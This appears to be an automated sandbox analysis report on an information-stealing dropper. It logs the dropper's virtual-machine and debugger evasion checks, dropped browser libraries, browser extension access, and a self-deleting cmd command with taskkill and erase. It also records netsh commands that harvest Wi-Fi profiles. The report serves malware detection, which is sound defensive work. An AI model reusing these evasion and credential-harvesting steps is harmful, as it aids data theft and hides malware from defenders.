Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: chormuim.exe, 00000008.00000000.371044114.00000000029DD000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe TID: 6256 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe TID: 6020 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 6_2_004019F0
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Dropped PE file which has not been started: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DotNetZip.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: Amcache.hve.29.dr Binary or memory string: VMware
Source: Amcache.hve.29.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.29.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.29.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.29.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: chormuim.exe, 00000008.00000000.372742094.000000001B711000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78Oin32p
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp, svchoste.exe, 00000004.00000002.329775240.0000000001312000.00000004.00000020.sdmp, WerFault.exe, 0000001D.00000002.397993752.0000026D6FEF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.29.dr Binary or memory string: VMware, Inc.me
Source: svchoste.exe, 00000004.00000002.329775240.0000000001312000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW,
Source: chormuim.exe, 00000008.00000002.407334729.0000000002AD1000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356819748.0000000002AD3000.00000004.00000001.sdmp, Info.txt.8.dr Binary or memory string: VirtualMachine: False
Source: chormuim.exe, 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371044114.00000000029DD000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp Binary or memory string: VirtualMachine:
Source: chormuim.exe, 00000008.00000000.359002218.000000001B711000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000003.350741840.000000001B717000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.408878521.000000001B711000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.372742094.000000001B711000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^:
Source: chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp Binary or memory string: VMware`
Source: dll.exe, 00000005.00000002.303723799.00000000005A1000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.29.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.29.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: chormuim.exe, 00000008.00000002.405581531.000000000081A000.00000004.00000020.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZYHDS8ZN1:
Source: chormuim.exe, 00000008.00000000.370261870.00000000026F3000.00000004.00000001.sdmp Binary or memory string: vmware
Source: WerFault.exe, 0000001D.00000003.396906821.0000026D6E03A000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000002.397615188.0000026D6E03A000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWP
Source: chormuim.exe, 00000008.00000003.350741840.000000001B717000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZY
Source: chormuim.exe, 00000008.00000002.409089267.000000001B7AC000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZYHDS8ZNLMEMp
Source: chormuim.exe, 00000008.00000002.409089267.000000001B7AC000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZYHDS8ZN`8X
Source: Amcache.hve.29.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.29.dr Binary or memory string: VMware7,1
Source: Amcache.hve.29.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.29.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.29.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: chormuim.exe, 00000008.00000000.372980265.000000001B900000.00000004.00000010.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZYHDS8ZNus
Source: Amcache.hve.29.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.29.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.29.dr Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.29.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: chormuim.exe, 00000008.00000000.362756816.000000001B900000.00000004.00000010.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZYHDS8ZNC:\WT:
Source: C:\Users\user\AppData\Local\Temp\dll.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8B4E0 GetSystemInfo, 4_2_00B8B4E0
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B743DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson, 4_2_00B743DF
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B90540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose, 4_2_00B90540
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 4_2_00B8E640
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 4_2_00B8D360
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8F6B0 FindFirstFileExW, 4_2_00B8F6B0
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 6_2_004019F0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8C810 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_00B8C810
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B896D0 mov eax, dword ptr fs:[00000030h] 4_2_00B896D0
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8B750 mov eax, dword ptr fs:[00000030h] 4_2_00B8B750
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process queried: DebugPort Jump to behavior
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360 Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B772E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00B772E6
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8B160 GetCurrentHwProfileA,GetProcessHeap,HeapAlloc,lstrcat, 4_2_00B8B160
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\dll.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B772E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00B772E6
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B74354 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00B74354
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B7E5C7 SetUnhandledExceptionFilter, 4_2_00B7E5C7
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00416F6A
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_004123F1 SetUnhandledExceptionFilter, 6_2_004123F1

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\svchoste.exe "C:\Users\user\AppData\Local\Temp\svchoste.exe" Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\dll.exe "C:\Users\user\AppData\Local\Temp\dll.exe" Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process created: C:\Users\user\AppData\Local\Temp\chormuimii.exe "C:\Users\user\AppData\Local\Temp\chormuimii.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 4648 & erase C:\Users\user\AppData\Local\Temp\svchoste.exe & RD /S /Q C:\\ProgramData\\216363876181815\\* & exit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe Process created: C:\ProgramData\AMD Driver\taskshell.exe "C:\ProgramData\AMD Driver\taskshell.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Process created: C:\Users\user\AppData\Local\Temp\chormuim.exe "C:\Users\user\AppData\Local\Temp\chormuim.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 4648
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Uses taskkill to terminate processes
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 4648
